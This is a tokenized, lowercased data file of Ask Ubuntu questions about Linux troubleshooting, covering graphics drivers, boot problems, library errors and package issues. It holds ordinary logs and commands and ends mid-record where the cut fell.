458713	javafx 8 not working in ubuntu 12.04	i am using netbeans 8.0 but in javafx 8 ( simple ) , and 3d applications are not running successfully . it shows an error : gen6+ requires kernel 3.6 or later . java : ../../../../../src/mesa/main/context.c:1501 : _mesa_make_current : assertion `newctx- > version > 0 ' failed . java result : 134 what should i do now as javafx 3d applications always works on windows when my nvidia driver is successfully installed . i have checked the additional drivers but its showing installed and active for nvidia .
458714	running ubuntu on t300la	i recently got a asus transformer book 13 inch ( t300la ) and would like to install ubuntu alongside my windows 8.1 install . i was able to turn on csm and boot my live usb with ubuntu 14.04 on it , ran the `` install alongside windows 8 '' option and the install finished . after restarting my computer , it booted straight to windows , never giving me the option to boot to ubuntu . i ran boot-repair and it suggested i turn off csm , however with csm off , it still does n't boot to ubuntu , and i ca n't boot my usb . my thought is that i need to be able to install ubuntu with csm off , and installing ubuntu under uefi mode , but ca n't seem to do so . any thoughts ?
458716	the system freezes a lot and dmesg gives an error in nvidia drivers	i faced constant system freezing in ubuntu under both unity and gnome shell . so i came to arch . in arch also im facing the same issue . i tried many things in these forums but nothing helped . please help me . the system hangs constantly and the mouse barely moves . when i press ctrl+alt+f2 it takes several minutes to go to the terminal and then i can reboot . please help . here 's the output of dmesg : [ 6.796717 ] acpi : video device [ gfx0 ] ( multi-head : yes rom : no post : no ) [ 6.797189 ] acpi device:43 : registered as cooling_device9 [ 6.797336 ] input : video bus as /devices/lnxsystm:00/device:00/pnp0a08:00/lnxvideo:00/input/input7 [ 6.799421 ] mei_me 0000:00:16.0 : irq 44 for msi/msi-x [ 6.805849 ] nvidia : module verification failed : signature and/or required key missing - tainting kernel [ 6.806853 ] acpi warning : 0x0000000000000428-0x000000000000042f systemio conflicts with region \pmio 1 ( 20131115/utaddress-251 ) [ 6.806861 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver [ 6.806865 ] acpi warning : 0x0000000000000530-0x000000000000053f systemio conflicts with region \gpio 1 ( 20131115/utaddress-251 ) [ 6.806869 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver [ 6.806871 ] acpi warning : 0x0000000000000500-0x000000000000052f systemio conflicts with region \gpio 1 ( 20131115/utaddress-251 ) [ 6.806874 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver [ 6.806876 ] lpc_ich : resource conflict ( s ) found affecting gpio_ich [ 6.811272 ] vgaarb : device changed decodes : pci:0000:01:00.0 , olddecodes=io+mem , decodes=none : owns=none [ 6.811890 ] [ drm ] initialized nvidia-drm 0.0.0 20130102 for 0000:01:00.0 on minor 0 [ 6.811899 ] nvrm : loading nvidia unix x86_64 kernel module 331.38 wed jan 8 19:32:30 pst 2014 [ 6.838317 ] type=1400 audit ( 1398926357.773:2 ) : apparmor= '' status '' operation= '' profile_load '' profile= '' unconfined '' name= '' /sbin/dhclient '' pid=393 comm= '' apparmor_parser '' [ 6.838325 ] type=1400 audit ( 1398926357.773:3 ) : apparmor= '' status '' operation= '' profile_load '' profile= '' unconfined '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=393 comm= '' apparmor_parser '' [ 6.838330 ] type=1400 audit ( 1398926357.773:4 ) : apparmor= '' status '' operation= '' profile_load '' profile= '' unconfined '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=393 comm= '' apparmor_parser '' [ 6.838816 ] type=1400 audit ( 1398926357.773:5 ) : apparmor= '' status '' operation= '' profile_replace '' profile= '' unconfined '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=393 comm= '' apparmor_parser '' [ 6.838823 ] type=1400 audit ( 1398926357.773:6 ) : apparmor= '' status '' operation= '' profile_replace '' profile= '' unconfined '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=393 comm= '' apparmor_parser '' [ 6.839087 ] type=1400 audit ( 1398926357.773:7 ) : apparmor= '' status '' operation= '' profile_replace '' profile= '' unconfined '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=393 comm= '' apparmor_parser '' [ 6.842069 ] i915 0000:00:02.0 : enabling device ( 0006 - > 0007 ) [ 6.843996 ] [ drm ] memory usable by graphics device = 2048m [ 6.844001 ] checking generic ( f1000000 300000 ) vs hw ( d0000000 10000000 ) [ 6.859946 ] ip_tables : ( c ) 2000-2006 netfilter core team [ 6.872309 ] lp0 : using parport0 ( interrupt-driven ) . [ 6.881353 ] nf_conntrack version 0.5.0 ( 16384 buckets , 65536 max ) [ 6.903318 ] kvm : disabled by bios [ 6.918282 ] ip6_tables : ( c ) 2000-2006 netfilter core team [ 6.938776 ] kvm : disabled by bios [ 6.947512 ] i915 0000:00:02.0 : irq 45 for msi/msi-x [ 6.947523 ] [ drm ] supports vblank timestamp caching rev 2 ( 21.10.2013 ) . [ 6.947525 ] [ drm ] driver supports precise vblank timestamp query . [ 6.970187 ] [ drm ] wrong mch_sskpd value : 0x16040307 [ 6.970189 ] [ drm ] this can cause pipe underruns and display issues . [ 6.970191 ] [ drm ] please upgrade your bios to fix this . [ 6.984295 ] i915 0000:00:02.0 : no connectors reported connected with modes [ 6.984297 ] [ drm ] can not find any crtc or sizes - going 1024x768 [ 6.985118 ] checking generic ( f1000000 300000 ) vs hw ( d0000000 10000000 ) [ 6.986601 ] i915 0000:00:02.0 : fb1 : inteldrmfb frame buffer device [ 6.986604 ] i915 0000:00:02.0 : registered panic notifier [ 6.986623 ] [ drm ] initialized i915 1.6.0 20080730 for 0000:00:02.0 on minor 1 [ 7.025551 ] asus_wmi : asus wmi generic driver loaded [ 7.027537 ] asus_wmi : initialization : 0x0 [ 7.027561 ] asus_wmi : bios wmi version : 0.9 [ 7.027611 ] asus_wmi : sfun value : 0x0 [ 7.028033 ] input : eee pc wmi hotkeys as /devices/platform/eeepc-wmi/input/input9 [ 7.033210 ] asus_wmi : backlight controlled by acpi video driver [ 7.072351 ] snd_hda_intel 0000:00:1b.0 : enabling device ( 0000 - > 0002 ) [ 7.072488 ] snd_hda_intel 0000:00:1b.0 : irq 46 for msi/msi-x [ 7.095533 ] autoconfig : line_outs=1 ( 0x1c/0x0/0x0/0x0/0x0 ) type : line [ 7.095538 ] speaker_outs=0 ( 0x0/0x0/0x0/0x0/0x0 ) [ 7.095540 ] hp_outs=1 ( 0x1d/0x0/0x0/0x0/0x0 ) [ 7.095541 ] mono : mono_out=0x0 [ 7.095543 ] dig-out=0x20/0x0 [ 7.095544 ] inputs : [ 7.095546 ] rear mic=0x1a [ 7.095548 ] front mic=0x1e [ 7.095549 ] line=0x1b [ 7.108797 ] input : hda intel pch hdmi/dp , pcm=7 as /devices/pci0000:00/0000:00:1b.0/sound/card0/input15 [ 7.108922 ] input : hda intel pch front headphone as /devices/pci0000:00/0000:00:1b.0/sound/card0/input14 [ 7.109033 ] input : hda intel pch line out as /devices/pci0000:00/0000:00:1b.0/sound/card0/input13 [ 7.109141 ] input : hda intel pch line as /devices/pci0000:00/0000:00:1b.0/sound/card0/input12 [ 7.109275 ] input : hda intel pch front mic as /devices/pci0000:00/0000:00:1b.0/sound/card0/input11 [ 7.109401 ] input : hda intel pch rear mic as /devices/pci0000:00/0000:00:1b.0/sound/card0/input10 [ 7.109962 ] snd_hda_intel 0000:01:00.1 : enabling device ( 0000 - > 0002 ) [ 7.110018 ] hda_intel : disabling msi [ 7.110024 ] hda-intel 0000:01:00.1 : handle vga-switcheroo audio client [ 7.110056 ] hda-intel 0000:01:00.1 : disabling 64bit dma [ 7.113372 ] hda-intel 0000:01:00.1 : enable delay in rirb handling [ 7.542846 ] input : hda nvidia hdmi/dp , pcm=8 as /devices/pci0000:00/0000:00:01.0/0000:01:00.1/sound/card1/input18 [ 7.542905 ] input : hda nvidia hdmi/dp , pcm=7 as /devices/pci0000:00/0000:00:01.0/0000:01:00.1/sound/card1/input17 [ 7.542946 ] input : hda nvidia hdmi/dp , pcm=3 as /devices/pci0000:00/0000:00:01.0/0000:01:00.1/sound/card1/input16 [ 7.957172 ] ext4-fs ( sda3 ) : re-mounted . opts : errors=remount-ro [ 8.680212 ] ext4-fs ( sdb5 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 8.790312 ] ext4-fs ( sda4 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 8.809947 ] [ drm ] enabling rc6 states : rc6 on , rc6p off , rc6pp off [ 8.871639 ] init : failsafe main process ( 745 ) killed by term signal [ 8.953226 ] bluetooth : core ver 2.17 [ 8.953244 ] net : registered protocol family 31 [ 8.953246 ] bluetooth : hci device and connection manager initialized [ 8.953253 ] bluetooth : hci socket layer initialized [ 8.953256 ] bluetooth : l2cap socket layer initialized [ 8.953260 ] bluetooth : sco socket layer initialized [ 8.957502 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 8.957505 ] bluetooth : bnep filters : protocol multicast [ 8.957516 ] bluetooth : bnep socket layer initialized [ 8.969666 ] bluetooth : rfcomm tty layer initialized [ 8.969676 ] bluetooth : rfcomm socket layer initialized [ 8.969681 ] bluetooth : rfcomm ver 1.11 [ 9.017952 ] type=1400 audit ( 1398926359.957:8 ) : apparmor= '' status '' operation= '' profile_load '' profile= '' unconfined '' name= '' /usr/lib/cups/backend/cups-pdf '' pid=873 comm= '' apparmor_parser '' [ 9.017961 ] type=1400 audit ( 1398926359.957:9 ) : apparmor= '' status '' operation= '' profile_load '' profile= '' unconfined '' name= '' /usr/sbin/cupsd '' pid=873 comm= '' apparmor_parser '' [ 9.018419 ] type=1400 audit ( 1398926359.957:10 ) : apparmor= '' status '' operation= '' profile_replace '' profile= '' unconfined '' name= '' /usr/sbin/cupsd '' pid=873 comm= '' apparmor_parser '' [ 9.024553 ] init : cups main process ( 885 ) killed by hup signal [ 9.024566 ] init : cups main process ended , respawning [ 9.059860 ] type=1400 audit ( 1398926359.997:11 ) : apparmor= '' status '' operation= '' profile_load '' profile= '' unconfined '' name= '' /usr/lib/lightdm/lightdm-guest-session '' pid=928 comm= '' apparmor_parser '' [ 9.184063 ] r8169 0000:03:00.0 eth0 : link down [ 9.184089 ] r8169 0000:03:00.0 eth0 : link down [ 9.184110 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 9.184333 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 9.359574 ] init : nvidia-prime main process ( 1000 ) terminated with status 127 [ 9.503728 ] init : gdm main process ( 1053 ) killed by term signal [ 9.559034 ] nvidia 0000:01:00.0 : irq 47 for msi/msi-x [ 10.104818 ] nvrm : your system is not currently configured to drive a vga console [ 10.104821 ] nvrm : on the primary vga device . the nvidia linux graphics driver [ 10.104823 ] nvrm : requires the use of a text-mode vga console . use of other console [ 10.104825 ] nvrm : drivers including , but not limited to , vesafb , may result in [ 10.104826 ] nvrm : corruption and stability problems , and is not supported . [ 10.271648 ] init : plymouth-upstart-bridge main process ended , respawning [ 10.278373 ] init : plymouth-upstart-bridge main process ( 1155 ) terminated with status 1 [ 10.278384 ] init : plymouth-upstart-bridge main process ended , respawning [ 11.324684 ] r8169 0000:03:00.0 eth0 : link up [ 11.324691 ] ipv6 : addrconf ( netdev_change ) : eth0 : link becomes ready [ 11.759991 ] init : plymouth-stop pre-start process ( 1663 ) terminated with status 1 [ 22.134770 ] audit_printk_skb : 150 callbacks suppressed [ 22.134775 ] type=1400 audit ( 1398926373.085:62 ) : apparmor= '' denied '' operation= '' open '' profile= '' /usr/lib/telepathy/mission-control-5 '' name= '' /home/pubudu/ssd/home/.config/libaccounts-glib/accounts.db '' pid=2117 comm= '' mission-control '' requested_mask= '' rw '' denied_mask= '' rw '' fsuid=1000 ouid=1000 [ 22.134846 ] type=1400 audit ( 1398926373.085:63 ) : apparmor= '' denied '' operation= '' open '' profile= '' /usr/lib/telepathy/mission-control-5 '' name= '' /home/pubudu/ssd/home/.config/libaccounts-glib/accounts.db '' pid=2117 comm= '' mission-control '' requested_mask= '' r '' denied_mask= '' r '' fsuid=1000 ouid=1000 [ 22.141819 ] type=1400 audit ( 1398926373.093:64 ) : apparmor= '' denied '' operation= '' open '' profile= '' /usr/lib/telepathy/mission-control-5 '' name= '' /home/pubudu/ssd/home/.config/dconf/user '' pid=2117 comm= '' mission-control '' requested_mask= '' r '' denied_mask= '' r '' fsuid=1000 ouid=1000 [ 22.649441 ] [ ufw block ] in=eth0 out= mac=01:00:5e:00:00:01:54:22 : f8 : f6 : c3:4c:08:00 src=192.168.1.1 dst=224.0.0.1 len=28 tos=0x00 prec=0x00 ttl=1 id=765 proto=2 [ 31.299568 ] type=1400 audit ( 1398926382.257:65 ) : apparmor= '' denied '' operation= '' open '' profile= '' /usr/lib/telepathy/mission-control-5 '' name= '' /home/pubudu/ssd/home/.config/dconf/user '' pid=2117 comm= '' mission-control '' requested_mask= '' r '' denied_mask= '' r '' fsuid=1000 ouid=1000 [ 31.299716 ] type=1400 audit ( 1398926382.257:66 ) : apparmor= '' denied '' operation= '' open '' profile= '' /usr/lib/telepathy/mission-control-5 '' name= '' /home/pubudu/ssd/home/.local/share/telepathy/mission-control/accounts.cfg '' pid=2117 comm= '' mission-control '' requested_mask= '' r '' denied_mask= '' r '' fsuid=1000 ouid=1000 [ 31.300963 ] type=1400 audit ( 1398926382.261:67 ) : apparmor= '' denied '' operation= '' mknod '' profile= '' /usr/lib/telepathy/mission-control-5 '' name= '' /home/pubudu/ssd/home/.local/share/telepathy/mission-control/accounts-goa.cfg.i1obfx '' pid=2117 comm= '' mission-control '' requested_mask= '' c '' denied_mask= '' c '' fsuid=1000 ouid=1000 [ 37.575101 ] [ ufw block ] in=eth0 out= mac=01:00:5e:00:00:01:54:22 : f8 : f6 : c3:4c:08:00 src=192.168.1.1 dst=224.0.0.1 len=28 tos=0x00 prec=0x00 ttl=1 id=778 proto=2 [ 39.050745 ] type=1400 audit ( 1398926390.013:68 ) : apparmor= '' status '' operation= '' profile_replace '' profile= '' unconfined '' name= '' /usr/lib/cups/backend/cups-pdf '' pid=3253 comm= '' apparmor_parser '' [ 39.050752 ] type=1400 audit ( 1398926390.013:69 ) : apparmor= '' status '' operation= '' profile_replace '' profile= '' unconfined '' name= '' /usr/sbin/cupsd '' pid=3253 comm= '' apparmor_parser '' [ 39.051093 ] type=1400 audit ( 1398926390.013:70 ) : apparmor= '' status '' operation= '' profile_replace '' profile= '' unconfined '' name= '' /usr/sbin/cupsd '' pid=3253 comm= '' apparmor_parser '' [ 52.500762 ] [ ufw block ] in=eth0 out= mac=01:00:5e:00:00:01:54:22 : f8 : f6 : c3:4c:08:00 src=192.168.1.1 dst=224.0.0.1 len=28 tos=0x00 prec=0x00 ttl=1 id=791 proto=2 [ 67.426342 ] [ ufw block ] in=eth0 out= mac=01:00:5e:00:00:01:54:22 : f8 : f6 : c3:4c:08:00 src=192.168.1.1 dst=224.0.0.1 len=28 tos=0x00 prec=0x00 ttl=1 id=804 proto=2 [ 67.449510 ] ext4-fs ( sda6 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 82.352044 ] [ ufw block ] in=eth0 out= mac=01:00:5e:00:00:01:54:22 : f8 : f6 : c3:4c:08:00 src=192.168.1.1 dst=224.0.0.1 len=28 tos=0x00 prec=0x00 ttl=1 id=817 proto=2 [ 84.876854 ] ext4-fs ( sdb8 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 97.277665 ] [ ufw block ] in=eth0 out= mac=01:00:5e:00:00:01:54:22 : f8 : f6 : c3:4c:08:00 src=192.168.1.1 dst=224.0.0.1 len=28 tos=0x00 prec=0x00 ttl=1 id=830 proto=2 [ 106.432985 ] nvrm : gpu at 0000:01:00 : gpu-3840b413-5a51-9da2-923a-a4cbb4a5005e [ 106.432995 ] nvrm : xid ( 0000:01:00 ) : 31 , ch 00000005 , engmask 00000101 , intr 10000000 [ 106.436635 ] nvrm : xid ( 0000:01:00 ) : 31 , ch 00000005 , engmask 00000101 , intr 10000000 note : before marking this as duplicate please note that i already know how to unfreeze the system after it freezes ( last time i posted a question like this you marked it as duplicate and redirected to a post which tells how to press ctrl+alt+f2.. i know how to do that. ) what i need to know is how to prevent the freezing before it freeze and why is it freezing ...
458717	ca n't run xfce4-settings-manager after upgrade to 14.04	as subject , from terminal i get this message : xfce4-settings-manager : symbol lookup error : xfce4-settings-manager : undefined symbol : xfce_dialog_show_help_with_version
458719	change audio framerate 25 ( pal ) -- > 23,976 ( ntsc )	here 's my problem : i need to change the framerate of the audio track of one of my films from 25 to 23,976 fps ( to mux it with a full hd version ) ; i used to make use of handbrake , re-encoding the film at highspeed and changing the framerate , setting the audio at high quality this time , i 'd like to change the framerate without affecting the audio quality nor re-encoding with a different format is there any way ? ( maybe ffmpeg ? -- > if so , please post the commands ) please , someone help me ! ! !
458720	android eclipse in ubuntu	i am having an error when launching eclipse for android developmet . error while loading shared libraries : libz.so.1 : can not open shared object file : no such file or directory pleae help me to solve this error .
458723	do i need anti-virus protection ?	i am completely new in ubuntu . just installed ubuntu 14.04 . on my other computer running windows , i am using avast , free edition . do i need anti-virus protection at all ?
458725	how to check if a video card is good or failure	my ubuntu 14.04 lts fail to launch . in menuboot , if i chose boot in the console option , the ubuntu 's launch in a low level graphic enviroment . i do n't know it may my graphic card got trouble . so how to check if a video card is good or failure ?
458733	freshly installed ubuntu 14.04 and is very slow	i installed ubuntu 14.04 on my desktop it 's an intel pentium 4 processor ( single core ) at 2.80ghz , 1gb ram , and for the graphics its intel 865g x86/mmx/sse2 os is 32 bit . boot up is quick and fast , but running anything is slow , it fades in/out slow . i did have 9.4 jaunty installed but i figured why not upgrade to the latest version . big mistake . : p windows 7 operated faster than this on this desktop . ahaha . is there anyway it could just be graphics ? i 'm new to this version , but i 've used 8,9 , and 12 , and i found that 12 thus far has been nice to use . but would love to try this version . i do have a laptop ( using right now ) it 's a dell inspiron 1501 ( yes my computers are old , but the laptop i got for free and the desktop i got for $ 40 . : p ) 3gb ddr2 ram , amd turion 64 x2 2.00ghz , ati radeon xpress , which is running windows 7 ultimate x86 . would 14.04 benefit on the laptop ? : p thanks . : )
458736	how to unlock file , locked by a process	the file is locked by a process , java in my case . i only want the lock to be released . lsof | grep /home/user/workspace1 a temporary solution was to 'end process ' from 'system monitor ' . but terminating java ( java virtual machine ) would terminate all other programs using java . so how shall i release the lock held by any process . for the same purpose windows has an application called 'unlocker ' .
458738	trouble with aptoncd backup	can i backup softwares installed using ubuntu software center using aptoncd ? i have installed all my aps using usc . they are not listed in aptoncd list .
458739	usb port forwarding in ubuntu aws machine from windows client	i am trying to access my local usb devices from remote amazon aws machine . for windows remote aws machine i was able to access it following these instructions : http : //www.howtogeek.com/97987/how-to-forward-local-drives-to-remote-machines-using-remote-desktop/ but i am not able to access from ubuntu remote machine .
458741	does any conky theme make notes like tomboy notes , xpad visible ?	as the title says , are their any themes which display text from tomboy , xpad or gedit ? or is their any file where i can edit to add text ?
458743	can not format my sd card	i am new at ubuntu i am trying to install weezcly raspian i 'm file from ubuntu 14.04 ltc , and since there are not room for installing it on my sd card i need to format it , and i can not format it i tryied in terminal typeing : format mmcblk0 hformat mmcblk0 and it says : hformat /home/michael error depending can not find ( file or directory ) but did not work how do you format an sd card , and can some one please help .
458748	is it possible to add a location/folder on my hard disk to sources.list ?	is it possible to add a location/folder on my hard disk ( ex : /media/data/ubuntu ) to the sources.list ? if possible , how ?
458750	vim refuses to start with `` error while loading shared libraries : libperl.so.5.14 '' after upgrade to ubuntu 14.04	after i upgraded to ubuntu 14.04 vim refuses to start , showing the following error : vim : error while loading shared libraries : libperl.so.5.14 : can not open shared object file : no such file or directory now , i reinstalled perl , i checked /usr/lib for libperl.so.5.14 file , there are three : libperl.so.5.14 , libperl.so.5.14.2 and libperl.so . yet i still get this error . why does n't it see perl ?
458751	how can i modify a file that is owned by root ?	i installed a program that runs in a browser . i would like to change the background picture it puts up on the screen or modify the existing one . the properties for that file tell me that it is owned by root . i am running ubuntu 12.04 really using linux for the 1st time . i am trying to make the switch from windows and finding it laborious : - ) how can i change that picture file using the gui ? how do i do this with root privileges ?
458758	low latency kernel becomes instable	i have got a old pc i use for recording my band using an usb audio interface into a daw . it 's very important to me that the latency for the input is possibly low . because of that i tried the low latency kernel - it works wonderful but only for a couple of minutes . after that the os becomes laggy and unresponsive . everything works just fine , when i switch to the generic kernel , but then i 've got those latencies.. i searched for solutions but i did n't really find anything . i have no idea , what could be wrong . the version of the low latency kernel is 3.11.0-20-lowlatency $ uname -a linux user-p5vdc-tvm 3.11.0-20-generic # 34-ubuntu smp tue apr 1 20:42:16 utc 2014 i686 i686 i686 gnu/linux $ cat /proc/cpuinfo processor : 0 vendor_id : genuineintel cpu family : 15 model : 4 model name : intel ( r ) pentium ( r ) 4 cpu 3.06ghz stepping : 9 microcode : 0x3 cpu mhz : 3058.774 cache size : 1024 kb physical id : 0 siblings : 2 core id : 0 cpu cores : 1 apicid : 0 initial apicid : 0 fdiv_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 5 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc pebs bts pni dtes64 monitor ds_cpl tm2 cid cx16 xtpr lahf_lm bogomips : 6117.54 clflush size : 64 cache_alignment : 128 address sizes : 36 bits physical , 48 bits virtual power management : processor : 1 vendor_id : genuineintel cpu family : 15 model : 4 model name : intel ( r ) pentium ( r ) 4 cpu 3.06ghz stepping : 9 microcode : 0x3 cpu mhz : 3058.774 cache size : 1024 kb physical id : 0 siblings : 2 core id : 0 cpu cores : 1 apicid : 1 initial apicid : 1 fdiv_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 5 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc pebs bts pni dtes64 monitor ds_cpl tm2 cid cx16 xtpr lahf_lm bogomips : 6117.54 clflush size : 64 cache_alignment : 128 address sizes : 36 bits physical , 48 bits virtual power management : thanks in advance .
458759	globus toolkit installation	i 'm trying to install globus toolkit on ubuntu 14.04 . when i ran make command i got problem that i mentioned below : globus @ jmd : ~/gt5.0.2-all-source-installer $ sudo make | tee installer [ sudo ] password for globus : /sandbox/globus/globus-5.0.2//sbin/gpt-build -srcdir=source-trees-thr/core/source gcc64dbgpthr subroutine compress : :zlib : :gzfile : :gzseek redefined at /usr/share/perl/5.18/compress/zlib.pm line 220. defined ( @ array ) is deprecated at /sandbox/globus/globus-5.0.2//lib/perl/grid/gpt/v1/bundle.pm line 1191 . ( maybe you should just omit the defined ( ) ? ) undefined subroutine & compress : :zlib : :gzdopen_ called at /sandbox/globus/globus-5.0.2//lib/perl/archive/tar.pm line 250. make : *** [ globus_core-thr-compile ] error 25
458760	trying to install ubuntu 14.04 but install stops	i 'm trying to install ubuntu 14.04 desktop x64 but it keeps on freezing up at ( stopping crash report submission daemon ) . i 'm pretty new to linux any help would be appreciated . pc specs : asus maximus v extreme i5-2500k cpu corsair vengeance 16gb ram geforce gtx 770 kingmax ssd 120gb 2 extra 500gb sata drives
458762	how to enable wireshark without running as root in trusty 14.04	i installed wireshark . running as root is not recommended , so i did sudo dpkg-reconfigure wireshark-common according to : http : //wiki.wireshark.org/capturesetup/captureprivileges http : //anonscm.debian.org/viewvc/collab-maint/ext-maint/wireshark/trunk/debian/readme.debian ? view=markup answered yes , logout out started wireshark and got this message : could n't run /usr/bin/dumpcap in child process : permission denied . i think i followed the recommended way of configuring wireshark , it worked in 13.10 , it does n't in 14.04 fyi , reconfiguring wireshark-common is actually setting the group for dumpcap to wireshark . still it does n't work . i checked that . how should it be done in 14.04 ?
458767	visual artifacts when using nvidia prime on intel driven monitors	i 've got a dell xps 15 which has 2 display outputs , one hdmi which is apparently driven by the onboard intel graphics card , one dp driven by the nvidia card . i 've tried to setup a triple screen setup ( onboard monitor , hdmi and dp ) and its all working nicely except that the two monitors driven by the intel card have some horrible visual artifacts permanently flickering on the screen . they do not appear when taking a screenshot so its got to be something to do with the graphics card/driver . i 've gone a bit retro and taken a photo of one of the screens to illustrate it . i think i got a bit unlucky with the photo , most of the time there are way more dotted lines than that , covering the screen . they flicker around quite a lot . interestingly while they do n't appear on the nvidia-driven screen usually , if i drag a window over there then the artifacts appear around the outside of the edge of the window . these visual artifacts do not appear when the nvidia card is disabled ( so the intel card is not just broken ) . its only when using nvidia prime to display on both sets of screens . any ideas for what i can try ? it feels like i 've tried every imaginable setting on nvidia settings and on compiz . thanks ...
458769	playing bluray in 14.04	i ca n't get bluray 's to play even after doing all the stuff that was suggested , vlc says the discs do n't appear to be bluray 's ... i have tried almost every bluray disc i own , including several that others claim work ... what is so different about 14.04 that none of the fixes for other versions wo n't work ? ? ?
458770	software properties will not run	i ca n't configure repositories and things on my kubuntu 14.04 lts system . when i run kdesudo software-properties-kde it asks me for my password then gives this traceback message : traceback ( most recent call last ) : file `` /usr/bin/software-properties-kde '' , line 136 , in < module > app = softwarepropertieskde ( datadir=data_dir , options=options , file=afile , attachwinid=attachwinid ) file `` /usr/lib/python3/dist-packages/softwareproperties/kde/softwarepropertieskde.py '' , line 64 , in __init__ softwareproperties.__init__ ( self , options=options , datadir=datadir ) file `` /usr/lib/python3/dist-packages/softwareproperties/softwareproperties.py '' , line 103 , in __init__ self.sourceslist = sourceslist ( ) file `` /usr/lib/python3/dist-packages/aptsources/sourceslist.py '' , line 274 , in __init__ self.matcher = sourceentrymatcher ( matcherpath ) file `` /usr/lib/python3/dist-packages/aptsources/sourceslist.py '' , line 459 , in __init__ dist = distinfo ( f , base_dir=matcherpath ) file `` /usr/lib/python3/dist-packages/aptsources/distinfo.py '' , line 186 , in __init__ for line in dist_file : file `` /usr/lib/python3.4/codecs.py '' , line 313 , in decode ( result , consumed ) = self._buffer_decode ( data , self.errors , final ) unicodedecodeerror : 'utf-8 ' codec ca n't decode byte 0xae in position 2 : invalid start byte i ca n't use add-apt-repository or software-properties-gtk either . how can i fix this issue ?
458771	how to package a net-beans java project for ubuntu	i 'm in final year of my b.tech , for project i have created an multilingual dictionary in java ( net beans 6.7.1 ) in which we can search words meaning , its synonyms , antonyms and an example , or if its not available than can add new word in data base . i have used swing , oracle data base 10g for words storage and external jar rs2xml which is not provided by oracle by default , i have many more ideas in my mind which i will apply on this project after my finals . now i want to publish it on ubuntu software center as an open source project so others can also share new ideas and make it successful . i have no idea how to convert net-beans java project into a debian package . is there any criteria that needs to be fulfill in order to publish your project on software center ? please help and explain each and every step clearly like how to backup database table and check if user have java or oracle installed on his computer or prompt him to install these first etc .
458774	usb wifi adapter compatibility	is there an actual list of compatible usb wifi adapters ? ? ? i have a netgear wna3100 that works for about 10 minutes then i have to restart the computer , i 've looked everywhere and found nothing helpful , so my ony conclusion is it wo n't work ! ! ! i had a d-link card that worked fine in windows but when i got it working in linux the card died shortly thereafter and does n't work anywhere now ... i want to know what i can buy off the shelf that works out of the box before i go spending more money ! ! ! i 've been looking at a linksys wusb6300 from what i can find it has a realtek chipset ...
458776	12.04 upgrade - graphics driver remains blank	a few days ago i done the latest patch update on my 12.04 which broke 2 items ( network and graphics ) . the network is fixed by rolling back , but the graphics has me stumped . system settings - > details - driver ( blank - nothing ) - experience standard lspci -nnk | grep -ia3 vga 01:05.0 vga compatible controller [ 0300 ] : advanced micro devices , inc. [ amd/ati ] rs780l [ radeon 3000 ] [ 1002:9616 ] subsystem : asustek computer inc. device [ 1043:8388 ] kernel driver in use : radeon kernel modules : radeon /usr/lib/nux/unity_support_test -p xlib : extension `` glx '' missing on display `` :0 '' . error : glx is not available on the system xorg.0.log extract appears to load driver ok [ 25.989 ] ( ii ) radeon ( 0 ) : creating default display subsection in screen section `` default screen section '' for depth/fbbpp 24/32 [ 25.989 ] ( == ) radeon ( 0 ) : depth 24 , ( -- ) framebuffer bpp 32 [ 25.989 ] ( ii ) radeon ( 0 ) : pixel depth = 24 bits stored in 4 bytes ( 32 bpp pixmaps ) [ 25.989 ] ( == ) radeon ( 0 ) : default visual is truecolor [ 25.989 ] ( == ) radeon ( 0 ) : rgb weight 888 [ 25.989 ] ( ii ) radeon ( 0 ) : using 8 bits per rgb ( 8 bit dac ) [ 25.989 ] ( -- ) radeon ( 0 ) : chipset : `` ati radeon 3000 graphics '' ( chipid = 0x9616 ) [ 25.989 ] ( ii ) radeon ( 0 ) : pci card detected [ 25.989 ] drmopendevice : node name is /dev/dri/card0 [ 25.989 ] drmopendevice : open result is 9 , ( ok ) [ 25.989 ] drmopenbybusid : searching for busid pci:0000:01:05.0 [ 25.989 ] drmopendevice : node name is /dev/dri/card0 [ 25.989 ] drmopendevice : open result is 9 , ( ok ) glxinfo name of display : :0 xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . error : could n't find rgb glx visual or fbconfig xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . running on a m5a78l-m/usb3 board with integrated ati radeonâ˘ hd 3000 gpu from other threads i have repeatedly re-run these steps . the last time it worked removed fglx* packages sudo sh /usr/share/ati/fglrx-uninstall.sh sudo apt-get remove -- purge fglrx fglrx_* fglrx-amdcccle* fglrx-dev* xorg-driver-fglrx removed navida packages sudo apt-get remove -- purge nvidia* reinstalled xorg sudo apt-get remove -- purge xserver-xorg-video-ati xserver-xorg-video-radeon sudo apt-get install xserver-xorg-video-ati sudo apt-get install -- reinstall 